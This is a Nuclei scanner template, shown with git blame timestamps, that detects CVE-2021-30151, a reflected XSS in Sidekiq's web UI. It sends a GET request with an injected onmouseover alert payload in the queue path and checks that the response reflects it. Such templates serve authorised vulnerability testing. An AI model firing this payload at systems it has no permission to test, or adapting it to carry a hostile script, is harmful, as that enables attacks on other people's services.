nuclei-templates/cves/2021/CVE-2021-30151.yaml

31 lines
760 B
YAML
Raw Normal View History

2021-04-10 17:28:27 +00:00
id: CVE-2021-30151
info:
name: CVE-2021-30151
author: DhiyaneshDk
severity: low
2021-04-10 19:30:49 +00:00
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
reference:
2021-04-10 17:28:27 +00:00
- https://github.com/mperham/sidekiq/issues/4852
2021-04-10 18:07:38 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
2021-04-11 12:21:41 +00:00
tags: cve,cve2021,xss,sidekiq
2021-04-10 17:28:27 +00:00
requests:
- method: GET
path:
2021-04-10 18:17:02 +00:00
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
2021-04-10 17:28:27 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-04-10 19:30:49 +00:00
- "onmouseover=\"alert('nuclei')"
2021-04-11 12:21:41 +00:00
2021-04-10 17:28:27 +00:00
- type: word
part: header
words:
- "text/html"
2021-04-11 12:21:41 +00:00
- type: status
status:
- 200